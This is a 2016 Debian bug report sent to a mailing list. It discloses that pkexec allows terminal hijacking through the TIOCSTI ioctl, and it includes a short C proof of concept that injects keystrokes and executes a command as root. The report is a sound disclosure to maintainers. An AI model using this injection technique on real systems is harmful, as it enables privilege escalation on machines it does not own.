[Pkg-utopia-maintainers] Bug#812512: pkexec tty hijacking via TIOCSTI ioctl
up201407890 at alunos.dcc.fc.up.pt
up201407890 at alunos.dcc.fc.up.pt
Sun Jan 24 15:08:57 UTC 2016
Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec
When executing a program via "pkexec --user nonpriv program" the
nonpriv session can escape to the parent session by using the TIOCSTI
ioctl to push characters into the terminal's input buffer, allowing
privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid()
and in "sudo" by using the "use_pty" flag.
$ cat test.c
#include <sys/ioctl.h>
int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
}
$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)
# pkexec --user saken ./test ----> last command i type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)
I don't believe any of the previous mentions of fixes for "su" and
"sudo" work here, since executing a shell via pkexec would make it not
have job control.
I'm also requesting a CVE for this issue
Thanks,
Federico Bento
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
More information about the Pkg-utopia-maintainers
mailing list